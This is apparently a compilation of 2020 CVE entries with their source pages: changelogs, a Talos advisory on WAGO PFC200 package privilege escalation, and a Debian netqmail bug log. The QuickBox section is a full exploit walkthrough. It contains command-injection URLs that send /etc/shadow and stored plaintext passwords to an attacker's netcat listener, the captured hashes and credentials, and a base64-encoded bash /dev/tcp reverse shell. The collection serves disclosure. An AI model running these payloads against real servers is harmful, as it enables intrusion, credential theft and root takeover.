The Server-Server protocol implementation in ngIRCd before 26~rc2 allows an out-of-bounds access, as demonstrated by the IRC_NJOIN() function.

**ngIRCd 26~rc2 (2020-06-11)**

The ChangeLog lists the following changes since ngIRCd 26~rc1:

*   Add AppStream metadata file (contrib/de.barton.ngircd.metainfo.xml).
    
*   Don't send invalid CHANINFO commands when a channel has mode +k set but no key is known to the server. This can happen with a misconfigured predefined channel, for example, and looked like this:
    
    Note the unset key represented by the two spaces. Fix this by sending a * in this case and update the CHANINFO documentation, too.
    
*   ngircd.spec: Fix names of README.md and INSTALL.md, add .md extension.
    
*   Update description texts in the README.md file, the RPM and Debian package files and the manual page: bring them in line with the updated homepage.
    
*   Server-Server protocol: Fix use-after-free when unregistering a directly connected server sending a SQUIT for itself.
    
*   Server-Server protocol: Detect bogus SERVER commands lacking a prefix. Thanks Hilko Bengen (hillu) for finding & reporting this as well for the patch & pull request (even if fixed differently).  
    Closes #275.
    
*   Fix the PING\-PONG logic: In ngIRCd 26~rc1 this was completely broken (while trying to fix timeouts during server handshakes in bigger networks): the daemon never disconnected any stale peers but kept sending out PINGs over and over again ...
    
*   Test suite: Add missing files needed to test SSL support to EXTRA_DIST, so that they are included in distribution archives: in rc1, "make check" fails when using sources from an archive and enabling SSL support. Thanks to Hilko Bengen bengen@hilluzination.de for the patch!

CVE-2020-14148: Release ngIRCd 26~rc2 · ngircd/ngircd

ScaleViewPortExtEx in libemf.cpp in libEMF (aka ECMA-234 Metafile Library) 1.0.12 allows an integer overflow and denial of service via a crafted EMF file.

Another security issue was patched in this release.

CVE-2020-13999

libEMF (aka ECMA-234 Metafile Library) through 1.0.12 is vulnerable to  
Integer overflow condition in libemf.cpp:ScaleviewportExtEx function  
leading to Denial of Service  
VulnerabilityType : Integer Overflow  
Vendor of Product : https://packages.debian.org/source/sid/libemf  
Affected Product Code Base : libemf - <=1.0.12  
Attack Type : Local ( Remote if libEMF is used anywhere in the web  
pipeline for processing EMF files )  
Impact: Denial of Service  
Has vendor confirmed or acknowledged the vulnerability? true

CVE-2020-13999: ECMA-234 Metafile Library / News: Release of libEMF-1.0.13

An exploitable code execution vulnerability exists in the Web-Based Management (WBM) functionality of WAGO PFC 200 03.03.10(15). A specially crafted series of HTTP requests can cause code execution resulting in remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**Summary**

An exploitable code execution vulnerability exists in the Web-Based Management (WBM) functionality of WAGO PFC 200 03.03.10(15). A specially crafted series of HTTP requests can cause code execution resulting in remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**Tested Versions**

WAGO PFC 200 03.03.10(15)

**Product URLs**

https://www.wago.com/us/pfc200

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**Details**

WAGO is a manufacturer of programmable automation controllers that are used in many industries including automotive, rail, power engineering, manufacturing, and building management.

The WBM (Web-Based Management) application provides configuration and customization to the user. WAGO documentation states that the web users are isolated from the Linux system users on the device,

The PFC 200 750-8206 user manual draws a clear distinction between the WBM and the Linux system users. Section 4.1.2.1.2 WBM User Group states:

    WBM has its own user administration system. The users in this system are isolated from the other user groups in the system for security reasons.
    

This vulnerability allows an attacker to gain root privileges on the device from the WBM admin user.

The software upload functionality of WBM allows the web-admin user to upload a software package and activate the software in the opkg .ipk format. The file structure of an .ipk file is relatively simple, and provides no integrity checks such as code signing for the software contained in the package. Below describes the contents of an .ipk file:

    |-- control
    |   |-- control
    |   |-- postinst
    |   |-- preinst
    |   |-- prerm
    |-- data
    |   |-- usr
    |   |   -- bin
    |   |       -- example_binary
    |   -- lib
    |       -- systemd
    |           -- system
    |               -- example_package.service
    |-- debian-binary
    

When the user activates the software package, that executes a shell script on the device called activate_download. The code excerpt below shows on line 097 and 109 that the package install/activate utility opkg is executed with root permissions:

    095:       update-script )     if [ "install" = $action ]; then
    096:                             #echo "activate" $path$filename "for update-script"      
    097:                             sudo /usr/bin/opkg install "$path$filename" > /dev/null 2> /dev/null
    098:                             
    099:                             if [ $? != $SUCCESS ]; then
    100: 
    101:                               status=$SHELL_ERROR
    102:                               ReportError $status "(/usr/bin/opkg install $path$filename)"
    103:                               SetLastError "Error while execution"
    104:                             fi
    105:                           fi
    106:               #force overwrite
    107:         if [ "force" = $action ]; then
    108:                             #echo "force-overwrite" $path$filename "for update-script"
    109:                             sudo /usr/bin/opkg install --force-overwrite --force-reinstall --force-downgrade "$path$filename" > /dev/null 2> /dev/null
    

Since the opkg utility is executed with root permissions, any of the scripts within the control portion of the package are also executed with root permissions. Additionally, the attacker can force the activation which means that the installed package can overwrite data from other packages. Forcing the activation gives an attacker the ability to overwrite system services with attacker controlled code.

**Timeline**

2020-02-11 - Vendor Disclosure  
2020-02-12 - Vendor acknowledged  
2020-05-06 - Talos follow up with vendor  
2020-05-07 - Vendor requested disclosure extension; Talos granted extension  
2020-06-10 - Public Release

Discovered through discussions between WAGO and Cisco Talos.

CVE-2020-6090: TALOS-2020-1010 || Cisco Talos Intelligence Group

An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.

CVE-2020-13401: Docker Engine 23.0 release notes

QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8 allows an authenticated remote attacker to execute code on the server via command injection in the servicestart parameter.

**Impact**

QuickBox CE <= v2.5.5 and QuickBox Pro <= 2.1.8 are both affected by an authenticated remote code execution (RCE) (_CVE-2020-13448_) and privilege escalation vulnerabilities (_CVE-2020-13694_ and _CVE-2020-13695_).  
A low-privileged user can execute arbitary commands on the server with the privileges of the user running the web server, and in turn escalate privileges to root by abusing weak sudo rules.

**What is QuickBox?**

QuickBox is a complete media server application and services management system, with a simplistic approach to achieving easy application installation and management from a beautifully designed dashboard, allowing users the ability to interact with their media server on a professional grade level.

**Versions affected**

*   QuickBox CE v2.5.5 and prior
*   QuickBox Pro v2.1.8 and prior

**Vulnerability**

Since this CVE covers two separate "versions" of QuickBox, with almost identical vulnerabilities, I have split the post into two parts; one for QuickBox CE and one for QuickBox Pro.

The vulnerability is located in the file `/inc/config.php`. This file is mainly used to setup configuration parameters to be used later by the application. At the end of this file we see that it also accept a GET parameter which will be used, unsanitized, in a call to `shell_exec`, leading to a command injection vulnerability.

Below is a snippet of the vulnerable code from`config.php`:

    switch (intval($_GET['id'])) {
    /* restart services */
    case 88:
      $process = $_GET['servicestart'];
        if ($process == "resilio-sync"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "shellinabox"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "emby-server"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "headphones"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "lidarr"){
          shell_exec("sudo systemctl stop $process");
          shell_exec("sudo systemctl disable $process");
        } elseif ($process == "nzbget"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "plexmediaserver"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "Tautulli"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "ombi"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "radarr"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "subsonic"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "transmission-daemon"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "qbittorrent"){
          shell_exec("sudo systemctl enable $process@$username");
          shell_exec("sudo systemctl restart $process@$username");
        } else {
          shell_exec("sudo systemctl restart $process@$username");
        }

Since we can control both `$_GET['id']` and `$_GET['servicestart']` we can inject our own commands into the last call to`shell_exec` and achieve remote code execution.

The complete vulnerable file can be found here: https://github.com/QuickBox/QB/blob/6f4253d82ccfdc85641fa6b27712569890687482/dashboard/inc/config.php

**Exploit**

Exploiting this vulnerability is pretty straight forward.

By sending a GET request to the following URL: `https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Dump /etc/shadow**

Upon further analysis we found that the www-data user can run quite a few commands and programs as root using sudo - _without a password_.  
One of the commands that can be executed is `grep`.  
But since the output of the command executed by `shell_exec`isn't displayed on the website, we won't see any output when trying to exfiltrate sensitive information.

One way to get a around this limitation is to use grep to write the contents of `/etc/shadow` to a file we can read from and use netcat to send the file back to our listener.

If we setup a netcat listener and visit the following URL we can trigger the exploit and receive the output of `/etc/shadow`:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+.+/etc/shadow+>pwds;nc+<OUR-IP-ADDRESS>+9001+<+pwds;rm+pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 58814
    root:$6$lYAppqO4$ParMSRU7IDtSULWHfA4sy8iQCm9/nJP.RksoLau0zBHp0VPbOfYBipZlcQ8VVvnvArRC37r3y/hBLgYRDZ5:18406:0:99999:7:::
    daemon:*:17920:0:99999:7:::
    bin:*:17920:0:99999:7:::
    sys:*:17920:0:99999:7:::
    sync:*:17920:0:99999:7:::
    games:*:17920:0:99999:7:::
    man:*:17920:0:99999:7:::
    lp:*:17920:0:99999:7:::
    mail:*:17920:0:99999:7:::
    news:*:17920:0:99999:7:::
    uucp:*:17920:0:99999:7:::
    proxy:*:17920:0:99999:7:::
    www-data:*:17920:0:99999:7:::
    backup:*:17920:0:99999:7:::
    list:*:17920:0:99999:7:::
    irc:*:17920:0:99999:7:::
    gnats:*:17920:0:99999:7:::
    nobody:*:17920:0:99999:7:::
    systemd-timesync:*:17920:0:99999:7:::
    systemd-network:*:17920:0:99999:7:::
    systemd-resolve:*:17920:0:99999:7:::
    systemd-bus-proxy:*:17920:0:99999:7:::
    syslog:*:17920:0:99999:7:::
    _apt:*:17920:0:99999:7:::
    postfix:*:17920:0:99999:7:::
    sshd:*:17920:0:99999:7:::
    uuidd:*:17920:0:99999:7:::
    messagebus:*:17920:0:99999:7:::
    s1gh:$6$hf2vF79G$APAqRRKp4Jax27xzZE1npHlumLWaDsgaHo3z/Sw6Z3tEnemam9h.EB1pXFx1Jy9mZ/jqaQoTBlL7TphlAZb210:18406:0:99999:7:::
    memcache:!:18406:0:99999:7:::
    vnstat:*:18406:0:99999:7:::
    debian-deluged:*:18406:0:99999:7:::
    ftp:*:18406:0:99999:7:::
    shellinabox:*:18406:0:99999:7:::
    test:$6$qPhsfmxz$Jm529ZLBiigWAhcRO3svLm4HLRFZsYgkWso0dTa2d6Bxb8UJd6LuCI1AVaOutXVheu2Z2iWugRQFQLeZGCecp.:18406:0:99999:7:::
    s1gh2:$6$zaGzrHfj$1Qgs5AWlruq2YJpPFs6TjO2QNtd.WpiAV7WMV9aQE1nJKAC1LdYTh/52/HkvBeYkBhzob/E1q6JwJp6zKGRHx.:18406:0:99999:7:::
    

**Privilege escalation**

Investigating further we found that the cleartext password of every QuickBox CE user is stored in \*.db files in `/root`.  
Since we can run `grep` as root we can dump all admin and non-admin passwords, and exfiltrate the passwords in the same way we did with `/etc/shadow`. This in turn gives us a way to escalate our privileges to that of the admin user. And since the admin user can `sudo su` without a password, we can now gain root access.

To trigger the exploit, setup a netcat listener and visit the following URL:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+-R+.+/root/+--include="*.info">pwds;nc+<OUR-IP-ADDRESS>+9001<pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 59136
    /root/s1gh2.info:s1gh2 : Password1234 
    /root/s1gh2.info:1GB
    /root/information.info:  Seedbox can be found at https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/information.info:  If you need to restart rtorrent/irssi, you can type 'reload'
    /root/information.info:  https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/test.info:test : test 
    /root/test.info:1GB
    /root/s1gh.info:#   https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)

The information.info file will contain the admin user credentials. In this case: `https://_s1gh_:_Password1234_@192.168.1.250 (Also works for FTP:5757/SSH:4747)`

With these credentials we can now ssh into the server and escalate our privileges to the root user.

    s1gh@kali~$: ssh s1gh@192.168.1.250 -p 4747
    s1gh@192.168.1.250's password: 
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.3.18-3-pve x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
    2 packages can be updated.
    0 updates are security updates.
    
    New release '18.04.4 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.
    
    Last login: Sun May 24 20:53:02 2020 from 192.168.1.126
     Welcome Back !
        * Dashboard:  https://192.168.1.250
        * Support:    https://plaza.quickbox.io
        * Donate:     https://quickbox.io/donate
    
    [s1gh@Ubuntu1604]:(0b)~$ sudo su
    
    
    |========================================================================|
    |------------------------------------------------------------------------|
    |  ###################   This Server is OFF limits   ####################|
    |------------------------------------------------------------------------|
         You are running QuickBox v2.5.5
         Your logged IP is 192.168.1.126:0.0
         Your BASH version is 4.3
         Mon May 25 21:16:30 UTC 2020
    |========================================================================|
    
    
    Ubuntu1604:/home/s1gh# whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**QuickBox Pro**

Due to a partially shared code base between CE and Pro, exactly the same command injection vulnerability can be found in the Pro version.  
The only difference is that `/inc/config.php` no longer exist and part of the source code is encrypted, so we had to manually find the injection point.

After a while we found the injection point in `index.php`.  
The exact same parameters as with the CE version can be abused to achieve RCE.

**Exploit**

By sending a GET request to the following URL: `https://<QUICKBOX-PRO-IP-ADDRESS>/index.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Privilege Escalation**

Since the www-data user can execute `sudo mysql` without a password, we can modify our GET request in such a way that we get a reverse shell as root instantly instead of first getting a shell as the www-data user and then doing the privilege escalation.

Our reverse shell will have a few "bad characters", so first we create a base64 encoded string of the following reverse shell: `bash -i >& /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>&1`

    s1gh@kali~$: echo -n "sudo mysql -e '\! /bin/bash -c \"bash -i >& /dev/tcp/192.168.1.126/9001 0>&1\"'" | base64
    c3VkbyBteXNxbCAtZSAnXCEgL2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMjYvOTAwMSAwPiYxIic=

Now that we have the base64 encoded reverse shell, we can visit the following url in order to trigger the exploit (_remember to first setup a netcat listener on your chosen port_):

`https://<QUICKBOX-PRO-IP-ADDRESS>?id=88&servicestart=a;echo+<BASE64-ENCODED-STRING>|base64+-d|bash;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 46862                 
    bash: cannot set terminal process group (135): Inappropriate ioctl for device   
    bash: no job control in this shell                        
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.5.5                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:25 UTC 2020                         
    |========================================================================|                                           
    
    
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.1.8                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:26 UTC 2020                         
    |========================================================================|                                           
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  Just type any one of the following commands                           |                                           
    |  to turn on different bash prompts                                     |                                           
    |------------------------------------------------------------------------|                                           
    |  commandprompt_on                                                      |                                           
    |  this prompt shows last command used & more                            |                                           
    |  powerprompt_on (default)                                              |                                           
    |  this prompt shows colorful system data - cpu, load etc.               |                                           
    |  basicprompt_on                                                        |                                           
    |  this prompt shows color coded load & cpu avg                          |                                           
    |  prompt_OFF                                                            |                                           
    |  this turns off prompts and goes back to default                       |                                           
    |========================================================================|                                           
    
    
    380/2048MB      0.99 1.35 1.60 1/817 6682                 
    [21016:21015 0:37] 07:30:26 Fri May 29 [root@QB-PRO] /srv/quickbox                                                   
    (2:37)# whoami;id                                         
    whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13448
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13694
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13695
*   https://www.exploit-db.com/exploits/48536
*   https://github.com/s1gh/QuickBox-CE-2.5.5-Authenticated-RCE

CVE-2020-13448: CVE-2020-13448 - QuickBox -  Authenticated RCE/Privilege Escalation

qmail-verify as used in netqmail 1.06 is prone to an information disclosure vulnerability. A local attacker can test for the existence of files and directories anywhere in the filesystem because qmail-verify runs as root and tests for the existence of files in the attacker's home directory, without dropping its privileges first.

**Debian Bug report logs - #961060  
qmail-verify: CVE-2020-3811 CVE-2020-3812**

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Tue, 19 May 2020 17:33:01 UTC

Severity: _grave_

Tags: patch, security, upstream

Found in versions netqmail/1.06-6, netqmail/1.06-5, netqmail/1.06-6.1

Fixed in versions netqmail/1.06-6.2~deb10u1, netqmail/1.06-6.2, netqmail/1.06-6.2~deb9u1

**Done:** Salvatore Bonaccorso <carnil@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

**Report forwarded** to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, Gerrit Pape <pape@smarden.org>:  
Bug#961060; Package src:netqmail. (Tue, 19 May 2020 17:33:03 GMT) (full text, mbox, link).

**Acknowledgement sent** to Salvatore Bonaccorso <carnil@debian.org>:  
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, Gerrit Pape <pape@smarden.org>. (Tue, 19 May 2020 17:33:03 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Source: netqmail
Version: 1.06-6.1
Severity: grave
Tags: security upstream
Justification: user security hole
Control: found -1 1.06-6
Control: found -1 1.06-5

Hi

See https://www.openwall.com/lists/oss-security/2020/05/19/8 for the
Qualys advisory covering CVE-2020-3811 and CVE-2020-3812.

Regards,
Salvatore

**Marked as found in versions netqmail/1.06-6.** Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 19 May 2020 17:33:03 GMT) (full text, mbox, link).

**Marked as found in versions netqmail/1.06-5.** Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 19 May 2020 17:33:04 GMT) (full text, mbox, link).

**Information forwarded** to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:  
Bug#961060; Package src:netqmail. (Wed, 20 May 2020 21:27:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Wed, 20 May 2020 21:27:04 GMT) (full text, mbox, link).

Message #14 received at 961060@bugs.debian.org (full text, mbox, reply):

\[Message part 1 (text/plain, inline)\]

Control: tags -1 + patch

On Tue, May 19, 2020 at 07:30:53PM +0200, Salvatore Bonaccorso wrote:
> Source: netqmail
> Version: 1.06-6.1
> Severity: grave
> Tags: security upstream
> Justification: user security hole
> Control: found -1 1.06-6
> Control: found -1 1.06-5
> 
> Hi
> 
> See https://www.openwall.com/lists/oss-security/2020/05/19/8 for the
> Qualys advisory covering CVE-2020-3811 and CVE-2020-3812.

debdiff based on the above attached.

Salvatore

\[netqmail\_1.06-6.2.debdiff (text/plain, attachment)\]

**Added tag(s) patch.** Request was from Salvatore Bonaccorso <carnil@debian.org> to 961060-submit@bugs.debian.org. (Wed, 20 May 2020 21:27:05 GMT) (full text, mbox, link).

**Information forwarded** to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:  
Bug#961060; Package src:netqmail. (Thu, 21 May 2020 09:03:02 GMT) (full text, mbox, link).

**Acknowledgement sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Thu, 21 May 2020 09:03:02 GMT) (full text, mbox, link).

Message #21 received at 961060@bugs.debian.org (full text, mbox, reply):

\[Message part 1 (text/plain, inline)\]

Dear maintainer,

I've prepared an NMU for netqmail (versioned as 1.06-6.2). The diff
is attached to this message. I did upload without delay as the version
are all the same basically in stretch and buster, apart the two fixed
bugs in 6.1 which would so help for the stretch and buster update.

We plan to release the DSA only in a few days after possibly someone
using qmail could verify the correct functioning.

Regards,
Salvatore

\[netqmail-1.06-6.2-nmu.diff (text/x-diff, attachment)\]

**Reply sent** to Salvatore Bonaccorso <carnil@debian.org>:  
You have taken responsibility. (Thu, 21 May 2020 09:24:03 GMT) (full text, mbox, link).

**Notification sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Bug acknowledged by developer. (Thu, 21 May 2020 09:24:03 GMT) (full text, mbox, link).

Message #26 received at 961060-close@bugs.debian.org (full text, mbox, reply):

Source: netqmail
Source-Version: 1.06-6.2
Done: Salvatore Bonaccorso <carnil@debian.org>

We believe that the bug you reported is fixed in the latest version of
netqmail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 961060@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated netqmail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 20 May 2020 22:23:21 +0200
Source: netqmail
Architecture: source
Version: 1.06-6.2
Distribution: unstable
Urgency: high
Maintainer: Gerrit Pape <pape@smarden.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 961060
Changes:
 netqmail (1.06-6.2) unstable; urgency=high
 .
   \* Address CVE-2005-1513, CVE-2005-1514, CVE-2005-1515, CVE-2020-3811 and
     CVE-2020-3812 (Closes: #961060)
Checksums-Sha1: 
 3e08b50a1403506eca9dead4f1e8fd3224802fe8 1867 netqmail\_1.06-6.2.dsc
 b7eaa958f99d286a5fc756491b3087129d2d891f 34656 netqmail\_1.06-6.2.diff.gz
Checksums-Sha256: 
 86de716050bcc42abfe6a1d241c2776f20b1d92f1e43a609cd0edd919458d645 1867 netqmail\_1.06-6.2.dsc
 25e0f8ab45a18e5b6c01b56f487405902104ac0064886f586838551e7e48f86a 34656 netqmail\_1.06-6.2.diff.gz
Files: 
 05227f81638d5075901698abf568a222 1867 mail extra netqmail\_1.06-6.2.dsc
 a0cae4ae44b43edb709ed2cd3df3ad5a 34656 mail extra netqmail\_1.06-6.2.diff.gz

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl7GQtxfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EWTEP/2VBsN8rfzJImVBxJXANIqyAhHlp4tPe
SgKTOIn5caen1gt51SpG4qYCuDFs967BQagepfVP/J8shwHTRv05SH5XyokFi/HZ
EREbhssApf+tlB4Wpnw+/AovOz/Mn6DQIZtj/V8ofIrP7lG6gjXuPiXlFKtoqWIc
14IH4CYzcc6O1cpC3r/I5FlzfP1tyjimM2OfnDYBV57jUR77xctp2j0pYi4xYcPZ
UOBbP0k0oemlS11ML4eA/uxQ55/Al+TNVASgNe/bhVX0f54/iUmQ8D+ZlngL29xO
qwbJcDe45o25qQpl4SybHrqouseY7nFDUNj2+VgQK3A2lXdHnLirH+lSJTgP7EEV
hAaeuBw0IB12t9wIz5BFFahTSILK8151LWA13B7Rik1WlSuB66yPgTymOKmLq5WZ
n5fvpbyUuxtXU04t6wmROqkmaPgtCX9P0RoxQdwwzbtM5TydvuhMHpOHHsHnFxgv
ck0hDaIf3FpC0pswImSb0pq0G/iDzN0uAzG7gywn8DUgRsK2hUyKCEy0DzobQz5E
hhgPQZ0IV8UgaTq7GPxGCy7CXzTjK3G3fPqEOiwLYuJOnk6Lr2s12XJw3DEOXnUq
si21AOAKxSGe515zVoxUO2mpt6llh8dLjlf2Ul1gL4ttJV9i/ZeoPUM+l2uCf5nQ
zym8iwnTtHD2
=LRm4
-----END PGP SIGNATURE-----

**Marked as fixed in versions netqmail/1.06-6.2~deb10u1.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 24 May 2020 08:48:03 GMT) (full text, mbox, link).

**Marked as fixed in versions netqmail/1.06-6.2~deb9u1.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 24 May 2020 08:48:04 GMT) (full text, mbox, link).

**Message sent on** to Salvatore Bonaccorso <carnil@debian.org>:  
Bug#961060. (Sun, 24 May 2020 08:48:09 GMT) (full text, mbox, link).

Message #33 received at 961060-submitter@bugs.debian.org (full text, mbox, reply):

close 672155 1.06-6.2~deb10u1
close 866038 1.06-6.2~deb10u1
close 961060 1.06-6.2~deb10u1
close 672155 1.06-6.2~deb9u1
close 866038 1.06-6.2~deb9u1
close 961060 1.06-6.2~deb9u1
thanks

**Reply sent** to Salvatore Bonaccorso <carnil@debian.org>:  
You have taken responsibility. (Sat, 30 May 2020 15:21:06 GMT) (full text, mbox, link).

**Notification sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Bug acknowledged by developer. (Sat, 30 May 2020 15:21:06 GMT) (full text, mbox, link).

Message #38 received at 961060-close@bugs.debian.org (full text, mbox, reply):

Source: netqmail
Source-Version: 1.06-6.2~deb10u1
Done: Salvatore Bonaccorso <carnil@debian.org>

We believe that the bug you reported is fixed in the latest version of
netqmail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 961060@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated netqmail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 21 May 2020 14:05:21 +0200
Source: netqmail
Architecture: source
Version: 1.06-6.2~deb10u1
Distribution: buster-security
Urgency: high
Maintainer: Gerrit Pape <pape@smarden.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 672155 866038 961060
Changes:
 netqmail (1.06-6.2~deb10u1) buster-security; urgency=high
 .
   \* Non-maintainer upload by the Security Team.
   \* Rebuild for buster-security
 .
 netqmail (1.06-6.2) unstable; urgency=high
 .
   \* Address CVE-2005-1513, CVE-2005-1514, CVE-2005-1515, CVE-2020-3811 and
     CVE-2020-3812 (Closes: #961060)
 .
 netqmail (1.06-6.1) unstable; urgency=medium
 .
   \* Non-maintainer upload.
   \* \[fdc8794a\] Setup Gitlab continous integration
   \* \[73e52807\] Fix quotation in postinst (Closes: #866038)
   \* \[2fc47776\] Make package piupart-clean (Closes: #672155)
Checksums-Sha1: 
 d26aa649d5cd44a182927ac94d6f90e04d78e4e7 1899 netqmail\_1.06-6.2~deb10u1.dsc
 6237c96362007a2737350a9a7bd412ec8212c5a1 34713 netqmail\_1.06-6.2~deb10u1.diff.gz
Checksums-Sha256: 
 4e298fceb2c2fe50494e912ee2e3f960d6d08baf3d994def7626933d5762a583 1899 netqmail\_1.06-6.2~deb10u1.dsc
 5cf18ff53285a7ec4c65fbe7d7114ea67c737d91199be70f06c9ef5ef9e0380d 34713 netqmail\_1.06-6.2~deb10u1.diff.gz
Files: 
 55e7f1742a835efd83e96888ec47bddd 1899 mail extra netqmail\_1.06-6.2~deb10u1.dsc
 8549a72092ad90b944c7ab2ac4c9680c 34713 mail extra netqmail\_1.06-6.2~deb10u1.diff.gz

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl7GcE5fFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89E0yIQAI4BuGS364JDXMQTMen7Gq16MBhWOL8u
